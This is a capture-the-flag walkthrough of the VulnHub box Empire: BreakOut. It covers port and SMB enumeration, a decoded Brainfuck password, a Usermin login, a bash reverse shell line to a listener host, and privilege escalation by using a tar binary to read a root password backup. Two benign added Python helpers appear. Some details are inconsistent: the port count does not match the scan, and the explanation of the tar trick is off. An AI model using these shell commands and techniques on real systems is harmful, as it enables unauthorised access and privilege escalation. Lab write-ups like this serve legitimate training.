CTF · Vulnhub

Empire: BreakOut

In my previous article, we completed the first VulnHub box of the Empire series. This walkthrough covers the second one, BreakOut.

The Walkthrough:- 

Step 1:- (Enumeration)  

First, find the target IP address using NetDiscover:

┌──(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0

From the scan, we have discovered that our target IP address is 192.168.56.104. With the IP address known, the next step is a port scan to detect which ports are open; this is an essential part of the enumeration process because it tells us what the attack surface looks like and lets us design targeted attacks. As in most cases, we are going to use the well-known Nmap tool with the following options:

  • -p- : scan all 65535 TCP ports rather than only the default top 1000
  • -A : enable OS detection, version detection, script scanning, and traceroute
  • -T 4 : use timing template 4 (aggressive), which speeds the scan up on a lab network
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -p- -A -T 4 192.168.56.104 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 12:02 IST
Nmap scan report for 192.168.56.104
Host is up (0.00068s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (92%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-14T06:33:57
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.34 ms 10.0.3.2
2   0.40 ms 192.168.56.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.51 seconds

From the Nmap output, we have found five open ports.

  • Port 80/TCP running an HTTP service, which indicates that there might be a website running.
  • Port 139/TCP and 445/TCP are both sharing the same service NetBios SSN.
  • Port 10000/TCP and 20000/TCP are both running HTTP services.
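Reading the port table by eye is fine for one host, but for a scan of a whole lab network it helps to turn the Nmap output into a structured inventory. The following Python script is an added example and is not part of the original walkthrough: it parses the port lines of Nmap's normal output format, attaches the NSE script lines that follow each port, and groups the open ports by service. SAMPLE_SCAN is a constructed input in the shape of the scan above; in practice you would feed it a file saved with `nmap -oN`.

```python
"""Parse Nmap normal-format output into a per-service inventory.

Added example, not part of the original post. SAMPLE_SCAN is constructed
for this example; replace it with the contents of an `nmap -oN` file.
"""
import re
import sys
from collections import defaultdict

# A port line looks like: "80/tcp    open  http        Apache httpd 2.4.51 ((Debian))"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Constructed sample in the shape of the scan shown above.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.56.104
Host is up (0.00068s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830

Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required
"""


def parse_ports(scan_text):
    """Return one dict per port line, in scan order, with its NSE script lines."""
    entries = []
    in_host_scripts = False
    for raw in scan_text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results"):
            in_host_scripts = True  # script lines after this belong to the host, not a port
            continue
        m = PORT_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["version"] = entry["version"].strip()
            entry["scripts"] = []
            entries.append(entry)
        elif line.startswith("|") and entries and not in_host_scripts:
            # "|_http-title: ..." -> "http-title: ..."
            entries[-1]["scripts"].append(line.lstrip("|_ "))
    return entries


def service_inventory(entries):
    """Group open ports by service name -> sorted list of port numbers."""
    inv = defaultdict(list)
    for e in entries:
        if e["state"] == "open":
            inv[e["service"]].append(e["port"])
    return {svc: sorted(ports) for svc, ports in inv.items()}


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    for e in parse_ports(text):
        print(f"{e['port']}/{e['proto']} {e['state']} {e['service']} {e['version']}")
        for s in e["scripts"]:
            print(f"    {s}")
    print(service_inventory(parse_ports(text)))
```

Grouping by service is what you actually want when prioritising: every port that speaks HTTP is a web surface to browse, and every netbios-ssn port is a candidate for share enumeration.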

To look at the content of the web service, open a web browser and navigate to the target's IP address in the URL bar.

The site turns out to be the default page of the Apache2 HTTP service. Nothing seems to be of interest here, so let's take a look at the content of the other two ports.

The page on the higher port shows a Webmin login form. If we find valid credentials, we can log in and gain a foothold on the server.

Step 2:- (Foothold)

From the Nmap scan, we have found two open ports running the NetBIOS-SSN service. 

139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2

HackTricks has a detailed reference for pentesting this port: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb. First, list the shares with smbclient, then enumerate the target with enum4linux. enum4linux is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract SMB-related information from the target.

┌──(rootharsh㉿kali)-[~]
└─$ smbclient -L //192.168.56.104/          
Password for [WORKGROUP\rootharsh]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
┌──(rootharsh㉿kali)-[~]
└─$ enum4linux -a 192.168.56.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 14 15:14:43 2023

 =========================================( Target Information )=========================================

Target ........... 192.168.56.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.104 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.56.104 )===============================

Looking up status of 192.168.56.104
        BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
        BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
        BREAKOUT        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.56.104 )==================================


[+] Server 192.168.56.104 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.56.104 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                               
                                                                                                                   
                                                                                                                   
 ==================================( OS information on 192.168.56.104 )==================================
                                                                                                                   
                                                                                                                   
[E] Can't get OS info with smbclient                                                                               
                                                                                                                   
                                                                                                                   
[+] Got OS info for 192.168.56.104 from srvinfo:                                                                   
        BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian                                                    
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ======================================( Users on 192.168.56.104 )======================================
                                                                                                                   
Use of uninitialized value $users in print at ./enum4linux.pl line 972.                                            
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.56.104 )================================
                                                                                                                   
smbXcli_negprot_smb1_done: No compatible protocol selected by server.                                              

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.56.104                                                                     
                                                                                                                   
//192.168.56.104/print$ Mapping: DENIED Listing: N/A Writing: N/A                                                  

[E] Can't understand response:                                                                                     
                                                                                                                   
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                         
//192.168.56.104/IPC$   Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.56.104 )===========================
                                                                                                                   
                                                                                                                   

[+] Attaching to 192.168.56.104 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] BREAKOUT
        [+] Builtin

[+] Password Info for Domain: BREAKOUT

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:                                                               
                                                                                                                   
                                                                                                                   
Password Complexity: Disabled                                                                                      
Minimum Password Length: 5


 ======================================( Groups on 192.168.56.104 )======================================
                                                                                                                   
                                                                                                                   
[+] Getting builtin groups:                                                                                        
                                                                                                                   
                                                                                                                   
[+]  Getting builtin group memberships:                                                                            
                                                                                                                   
                                                                                                                   
[+]  Getting local groups:                                                                                         
                                                                                                                   
                                                                                                                   
[+]  Getting local group memberships:                                                                              
                                                                                                                   
                                                                                                                   
[+]  Getting domain groups:                                                                                        
                                                                                                                   
                                                                                                                   
[+]  Getting domain group memberships:                                                                             
                                                                                                                   
                                                                                                                   
 =================( Users on 192.168.56.104 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                   
                                                                                                                   
[I] Found new SID:                                                                                                 
S-1-22-1                                                                                                           

[I] Found new SID:                                                                                                 
S-1-5-32                                                                                                           

[I] Found new SID:                                                                                                 
S-1-5-32                                                                                                           

[I] Found new SID:                                                                                                 
S-1-5-32                                                                                                           

[I] Found new SID:                                                                                                 
S-1-5-32                                                                                                           

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                        
                                                                                                                   
S-1-5-32-544 BUILTIN\Administrators (Local Group)                                                                  
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                        
                                                                                                                   
S-1-22-1-1000 Unix User\cyber (Local User)                                                                         

[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''       
                                                                                                                   
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)                                         
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)

 ==============================( Getting printer info for 192.168.56.104 )==============================
                                                                                                                   
No printers returned.                                                                                              


enum4linux complete on Tue Mar 14 15:15:18 2023
                                                                                                                   
┌──(rootharsh㉿kali)-[~]
└─$                                                                                         

From the output, we have identified a local user, cyber, which might be the account we need to log in to Webmin. Now that we have a username, we only need the password. If you take a look at the page source of the Apache2 Debian default page, you will find an encoded message.

The message is a program written in the Brainfuck esoteric language. Open the browser and search for a Brainfuck interpreter (https://www.dcode.fr/brainfuck-language), paste the program in and execute it.

On successful execution, the program prints a password. Now we have a valid username (cyber) and password, so let's try to log in to the web portal on port 20000.
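Pasting a blob from a target into a third-party web decoder is not always an option, so here is an offline alternative. The interpreter below is an added example written for this article, not code from the original post or from the box: it implements the eight Brainfuck instructions with 8-bit wrapping cells, precomputes bracket matching so unbalanced programs are rejected up front, and enforces a step limit so a malformed or looping program cannot hang the decoder. SAMPLE_PROGRAM is constructed for this example and is not the program found on BreakOut.

```python
"""Minimal Brainfuck interpreter for decoding blobs offline.

Added example, not part of the original post. SAMPLE_PROGRAM is constructed
for this example; paste the program from the page source in its place.
"""


def _match_brackets(code):
    """Precompute matching [ ] positions; raise on unbalanced brackets."""
    stack, pairs = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return pairs


def run_brainfuck(code, stdin=b"", max_steps=1_000_000):
    """Execute a Brainfuck program and return everything it printed as a string.

    Cells are 8-bit and wrap around, the tape grows to the right on demand,
    and max_steps stops runaway programs (a safety net for untrusted input).
    """
    code = "".join(ch for ch in code if ch in "<>+-.,[]")  # drop comments/whitespace
    pairs = _match_brackets(code)
    tape, ptr, pc, steps = [0], 0, 0, 0
    out, inp = bytearray(), list(stdin)
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved below cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp.pop(0) if inp else 0  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = pairs[pc]  # jump past the matching ]
        elif ch == "]" and tape[ptr] != 0:
            pc = pairs[pc]  # jump back to the matching [
        pc += 1
    return out.decode("latin-1")


# Constructed sample: 8 * 9 = 72 ('H') in cell 1, then +1 gives 'I'.
SAMPLE_PROGRAM = "++++++++[>+++++++++<-]>.+."

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE_PROGRAM))  # prints HI
```

Brainfuck is a programming language, not a cipher: there is no key, so "decoding" just means running the program and reading what it prints, and that holds for any program the page source could contain.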

The login was successful and displays the Usermin application dashboard.

Open a command shell from the Usermin dashboard: Login >> Command Shell.

Next, run the ls command to list the files and directories. As a result, we find user.txt.

Read it using the cat command.

Let’s create a Bash reverse shell: 

bash -i >& /dev/tcp/<LHOST>/4242 0>&1

Before running this command on the target, start a Netcat listener on your own machine (the LHOST address) on the port you specified:

┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ..

After the command is executed on the target, the listener on port 4242 receives the reverse shell. Upgrade it to an interactive TTY with python3 and set TERM so the shell behaves properly:

┌──(rootharsh㉿kali)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 39292
bash: cannot set terminal process group (1897): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$ export TERM=xterm
export TERM=xterm
cyber@breakout:~$

Since this is not the root user, let’s identify further information about the target machine, which could be useful for gaining root access.

Step 3:- (Privilege Escalation)

Let's identify the rights and privileges of the current user by executing the sudo -l command:

cyber@breakout:~$ sudo -l
sudo -l
bash: sudo: command not found

This error means the sudo command-line utility is not installed, and as an unprivileged user we cannot install it. So we need to find another way to escalate privileges locally. Start by listing the home directory:

cyber@breakout:~$ ls -al
ls -al
total 568
drwxr-xr-x  8 cyber cyber   4096 Oct 20  2021 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-------  1 cyber cyber      0 Oct 20  2021 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20  2021 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt

As our instance is running HTTP servers, there might be some clue on the file system, so let's take a look at the files and directories under /var. Notice that there is a backups directory listed there; take a look at the content of /var/backups as well.

cyber@breakout:~$ ls -al /var
ls -al /var
total 56
drwxr-xr-x 14 root root  4096 Oct 19  2021 .
drwxr-xr-x 18 root root  4096 Oct 19  2021 ..
drwxr-xr-x  2 root root  4096 Mar 14 03:06 backups
drwxr-xr-x 12 root root  4096 Oct 19  2021 cache
drwxr-xr-x 25 root root  4096 Oct 19  2021 lib
drwxrwsr-x  2 root staff 4096 Apr 10  2021 local
lrwxrwxrwx  1 root root     9 Oct 19  2021 lock -> /run/lock
drwxr-xr-x  8 root root  4096 Mar 14 02:21 log
drwxrwsr-x  2 root mail  4096 Oct 19  2021 mail
drwxr-xr-x  2 root root  4096 Oct 19  2021 opt
lrwxrwxrwx  1 root root     4 Oct 19  2021 run -> /run
drwxr-xr-x  5 root root  4096 Oct 19  2021 spool
drwxrwxrwt  5 root root  4096 Mar 14 02:21 tmp
drwxr-xr-x  3 root root  4096 Mar 14 02:21 usermin
drwx------  3 root bin   4096 Mar 14 02:21 webmin
drwxr-xr-x  3 root root  4096 Oct 19  2021 www

Inside /var/backups there is a file, .old_pass.bak, which we have no privilege to read as the cyber user. However, if you look back at the listing of the home directory, you will have noticed a tar binary owned by root with read, write and execute permission for its owner and read and execute permission for everyone else.

-rwxr-xr-x  1 root  root  531928 Oct 19 15:40 tar

What is tar?

Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.

Let's use this tar binary to create an archive called backup.tar containing the protected file:

cyber@breakout:~$ ./tar -cf backup.tar /var/backups/.old_pass.bak
./tar -cf backup.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
backup.tar  tar  user.txt
cyber@breakout:~$

On successful execution you will notice a tar archive in the current directory. Extract it and take a look at the content: because tar stripped the leading slash from the member name, the file is extracted under ./var/backups inside the home directory, where it is owned by cyber and therefore readable.

cyber@breakout:~$ tar -xf backup.tar
tar -xf backup.tar
cyber@breakout:~$ ls
ls
backup.tar  tar  user.txt  var
cyber@breakout:~$ cd var	
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls -al
ls -al
total 12
drwxr-xr-x 2 cyber cyber 4096 Feb 12 09:50 .
drwxr-xr-x 3 cyber cyber 4096 Feb 12 09:50 ..
-rw------- 1 cyber cyber   17 Oct 20 07:49 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$

From the output we have spotted a password. Let's try to log in as the root user with it.

cyber@breakout:~/var/backups$ su root
su root
Password: Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups#

Finally, we have a root shell; verify it using the id command.

root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups#

Now that we have confirmed we are root, simply change directory to /root to obtain the root flag.

root@breakout:~# cd /root
cd /root
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
root@breakout:~#

Congratulations on completing both Capture the Flags!
